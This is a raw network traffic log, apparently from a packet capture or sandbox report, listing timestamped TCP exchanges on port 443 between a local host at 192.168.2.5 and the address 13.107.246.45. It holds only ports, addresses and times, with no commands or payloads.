Nov 4, 2024 17:31:52.742062092 CET	49863	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.742077112 CET	443	49863	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.742088079 CET	443	49863	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.745095015 CET	49868	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.745126009 CET	443	49868	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.745232105 CET	49868	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.745452881 CET	49868	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.745465994 CET	443	49868	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.978171110 CET	443	49864	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.978688002 CET	49864	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.978699923 CET	443	49864	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:52.979202032 CET	49864	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:52.979207039 CET	443	49864	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.104576111 CET	443	49866	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.105097055 CET	49866	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.105109930 CET	443	49866	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.105566978 CET	49866	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.105577946 CET	443	49866	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.108006001 CET	443	49864	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.108059883 CET	443	49864	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.108107090 CET	49864	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.108109951 CET	443	49864	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.108154058 CET	49864	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.108341932 CET	49864	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.108341932 CET	49864	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.108357906 CET	443	49864	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.108366966 CET	443	49864	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.111063957 CET	49869	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.111104965 CET	443	49869	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.111212969 CET	49869	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.111404896 CET	49869	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.111423016 CET	443	49869	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.140594006 CET	443	49865	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.141088963 CET	49865	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.141102076 CET	443	49865	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.141541004 CET	49865	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.141546965 CET	443	49865	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.233313084 CET	443	49866	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.233577967 CET	443	49866	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.233627081 CET	443	49866	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.233654976 CET	49866	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.233798027 CET	49866	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.233798027 CET	49866	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.233798027 CET	49866	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.236270905 CET	49870	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.236315966 CET	443	49870	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.236392021 CET	49870	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.236522913 CET	49870	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.236531019 CET	443	49870	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.262183905 CET	443	49867	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.262572050 CET	49867	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.262587070 CET	443	49867	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.263003111 CET	49867	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.263008118 CET	443	49867	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.277086973 CET	443	49865	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.277148962 CET	443	49865	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.277198076 CET	49865	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.277297974 CET	49865	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.277311087 CET	443	49865	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.277319908 CET	49865	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.277324915 CET	443	49865	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.279599905 CET	49871	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.279614925 CET	443	49871	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.279696941 CET	49871	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.279835939 CET	49871	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.279845953 CET	443	49871	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.392014027 CET	443	49867	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.392080069 CET	443	49867	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.392141104 CET	49867	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.392307997 CET	49867	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.392318964 CET	443	49867	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.392328978 CET	49867	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.392333984 CET	443	49867	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.395042896 CET	49872	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.395065069 CET	443	49872	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.395147085 CET	49872	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.395277977 CET	49872	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.395287991 CET	443	49872	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.474170923 CET	443	49868	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.474827051 CET	49868	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.474843025 CET	443	49868	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.475305080 CET	49868	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.475311041 CET	443	49868	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.536890984 CET	49866	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.536910057 CET	443	49866	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.607409000 CET	443	49868	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.607489109 CET	443	49868	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.607547045 CET	49868	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.607745886 CET	49868	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.607745886 CET	49868	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.607763052 CET	443	49868	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.607768059 CET	443	49868	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.610765934 CET	49873	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.610805988 CET	443	49873	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.610869884 CET	49873	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.611056089 CET	49873	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.611068964 CET	443	49873	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.853912115 CET	443	49869	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.871071100 CET	49869	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.871083021 CET	443	49869	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.871558905 CET	49869	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.871563911 CET	443	49869	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.979559898 CET	443	49870	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.980178118 CET	49870	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.980194092 CET	443	49870	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.980703115 CET	49870	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.980709076 CET	443	49870	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.997596979 CET	443	49869	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.997948885 CET	443	49869	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:53.998131990 CET	49869	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.998131990 CET	49869	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:53.998131990 CET	49869	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.000869989 CET	49874	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.000907898 CET	443	49874	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.000991106 CET	49874	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.001123905 CET	49874	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.001137018 CET	443	49874	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.027941942 CET	443	49871	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.028567076 CET	49871	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.028573990 CET	443	49871	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.029124975 CET	49871	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.029129028 CET	443	49871	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.110630989 CET	443	49870	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.110694885 CET	443	49870	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.110744953 CET	49870	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.144999027 CET	443	49872	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.159480095 CET	443	49871	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.159548998 CET	443	49871	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.159607887 CET	49871	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.169044971 CET	49870	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.169044971 CET	49870	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.169060946 CET	443	49870	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.169070005 CET	443	49870	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.171148062 CET	49872	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.171180964 CET	443	49872	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.172080040 CET	49872	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.172086954 CET	443	49872	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.174468040 CET	49871	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.174491882 CET	443	49871	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.174504042 CET	49871	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.174510956 CET	443	49871	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.178011894 CET	49875	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.178047895 CET	443	49875	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.178108931 CET	49875	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.178246975 CET	49875	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.178262949 CET	443	49875	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.178381920 CET	49876	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.178406000 CET	443	49876	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.178461075 CET	49876	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.178560019 CET	49876	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.178575039 CET	443	49876	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.224272966 CET	49869	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.224287033 CET	443	49869	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.309180021 CET	443	49872	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.309258938 CET	443	49872	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.309315920 CET	49872	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.309562922 CET	49872	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.309577942 CET	443	49872	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.309587955 CET	49872	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.309593916 CET	443	49872	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.312196970 CET	49877	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.312228918 CET	443	49877	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.312320948 CET	49877	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.312417984 CET	49877	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.312423944 CET	443	49877	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.367846966 CET	443	49873	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.368311882 CET	49873	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.368333101 CET	443	49873	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.368833065 CET	49873	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.368838072 CET	443	49873	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.503077030 CET	443	49873	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.506671906 CET	443	49873	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.506736040 CET	49873	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.507335901 CET	49873	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.507335901 CET	49873	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.507359028 CET	443	49873	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.507370949 CET	443	49873	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.511468887 CET	49878	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.511503935 CET	443	49878	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.511570930 CET	49878	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.511697054 CET	49878	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.511717081 CET	443	49878	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.733824015 CET	443	49874	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.734534025 CET	49874	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.734556913 CET	443	49874	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.735018015 CET	49874	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.735023975 CET	443	49874	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.870275974 CET	443	49874	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.870311975 CET	443	49874	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.870358944 CET	443	49874	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.870425940 CET	49874	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.870445013 CET	49874	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.870701075 CET	49874	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.870723009 CET	443	49874	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.870737076 CET	49874	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.870743036 CET	443	49874	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.873802900 CET	49879	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.873821020 CET	443	49879	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.873925924 CET	49879	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.874108076 CET	49879	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.874118090 CET	443	49879	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.909626007 CET	443	49876	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.910326958 CET	49876	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.910355091 CET	443	49876	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.910794020 CET	49876	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.910801888 CET	443	49876	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.914321899 CET	443	49875	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.914652109 CET	49875	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.914684057 CET	443	49875	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:54.914978027 CET	49875	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:54.914983988 CET	443	49875	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.040682077 CET	443	49877	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.041436911 CET	49877	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.041450024 CET	443	49877	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.041990042 CET	49877	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.041997910 CET	443	49877	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.044317961 CET	443	49876	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.044451952 CET	443	49876	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.044507027 CET	49876	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.044682980 CET	49876	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.044682980 CET	49876	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.044698954 CET	443	49876	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.044708967 CET	443	49876	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.047607899 CET	49880	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.047636986 CET	443	49880	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.047713041 CET	49880	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.047866106 CET	49880	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.047879934 CET	443	49880	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.048816919 CET	443	49875	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.048976898 CET	443	49875	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.049140930 CET	49875	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.049209118 CET	49875	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.049209118 CET	49875	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.049221039 CET	443	49875	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.049228907 CET	443	49875	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.051356077 CET	49881	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.051392078 CET	443	49881	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.051558018 CET	49881	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.051678896 CET	49881	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.051691055 CET	443	49881	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.170164108 CET	443	49877	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.170691013 CET	443	49877	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.170753002 CET	49877	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.186748981 CET	49877	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.186769009 CET	443	49877	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.186781883 CET	49877	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.186788082 CET	443	49877	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.194749117 CET	49882	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.194783926 CET	443	49882	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.194859982 CET	49882	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.195086956 CET	49882	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.195101976 CET	443	49882	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.233109951 CET	443	49878	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.234062910 CET	49878	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.234088898 CET	443	49878	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.234812975 CET	49878	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.234818935 CET	443	49878	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.365257978 CET	443	49878	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.365281105 CET	443	49878	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.365336895 CET	443	49878	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.365397930 CET	49878	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.365438938 CET	49878	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.365633011 CET	49878	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.365653038 CET	443	49878	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.365664005 CET	49878	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.365672112 CET	443	49878	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.368288040 CET	49883	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.368331909 CET	443	49883	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.368421078 CET	49883	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.368568897 CET	49883	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.368577957 CET	443	49883	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.608407021 CET	443	49879	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.608936071 CET	49879	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.608952999 CET	443	49879	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.609416008 CET	49879	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.609421015 CET	443	49879	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.738213062 CET	443	49879	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.738253117 CET	443	49879	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.738300085 CET	443	49879	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.738326073 CET	49879	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.738354921 CET	49879	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.738601923 CET	49879	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.738619089 CET	443	49879	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.738630056 CET	49879	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.738636017 CET	443	49879	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.744834900 CET	49884	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.744875908 CET	443	49884	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.744954109 CET	49884	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.745182991 CET	49884	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.745199919 CET	443	49884	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.781769037 CET	443	49881	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.784111977 CET	49881	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.784148932 CET	443	49881	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.784610987 CET	49881	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.784617901 CET	443	49881	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.794388056 CET	443	49880	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.794859886 CET	49880	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.794882059 CET	443	49880	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.795342922 CET	49880	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.795347929 CET	443	49880	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.917593002 CET	443	49881	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.917653084 CET	443	49881	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.917747021 CET	49881	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.917980909 CET	49881	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.917999029 CET	443	49881	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.918009043 CET	49881	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.918020964 CET	443	49881	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.921092033 CET	49885	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.921147108 CET	443	49885	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.921247005 CET	49885	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.921428919 CET	49885	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.921446085 CET	443	49885	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.927521944 CET	443	49880	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.927572012 CET	443	49880	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.927617073 CET	443	49880	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.927645922 CET	49880	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.927678108 CET	49880	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.927901983 CET	49880	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.927921057 CET	443	49880	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.927932978 CET	49880	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.927938938 CET	443	49880	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.930265903 CET	49886	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.930300951 CET	443	49886	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.930403948 CET	49886	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.930566072 CET	49886	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.930579901 CET	443	49886	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.991930962 CET	443	49882	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.992492914 CET	49882	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.992511034 CET	443	49882	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:55.992955923 CET	49882	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:55.992961884 CET	443	49882	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:56.086203098 CET	443	49883	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:56.086910963 CET	49883	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:56.086934090 CET	443	49883	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:56.087583065 CET	49883	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:56.087615967 CET	443	49883	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:56.128166914 CET	443	49882	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:56.128253937 CET	443	49882	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:56.128307104 CET	443	49882	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:56.128305912 CET	49882	443	192.168.2.5	13.107.246.45
